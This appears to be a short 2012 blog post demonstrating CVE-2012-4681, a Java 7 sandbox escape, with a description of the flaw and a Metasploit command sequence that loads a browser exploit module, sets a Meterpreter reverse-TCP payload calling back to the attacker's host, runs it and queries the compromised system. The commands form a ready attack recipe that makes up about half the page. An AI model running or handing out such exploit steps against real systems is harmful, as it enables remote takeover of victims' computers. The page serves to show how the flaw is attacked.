Archive | August 30, 2012
Video

CVE-2012-4681 Java 7 Windows Metasploit Demo

This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is now patch from Oracle [Java 7 Update 7 release]. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.

Metasploit demo:

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid